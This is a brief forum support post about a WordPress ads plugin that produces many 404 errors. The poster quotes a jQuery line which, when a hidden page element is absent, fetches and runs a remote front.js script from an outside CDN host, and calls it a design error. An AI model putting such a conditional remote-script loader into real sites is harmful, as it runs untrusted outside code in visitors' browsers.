Replies: 0
I was getting a large number of 404s, so I decided to dig in deeper.
I found the plugin calling a javascript called front.js by using inspect element:
jQuery(document).ready(function($){if($(‘#adsforwp-hidden-block’).length==0){$.getScript(“https://lifemathmoney.b-cdn.net/front.js”);}});
This seems to be some sort of design error.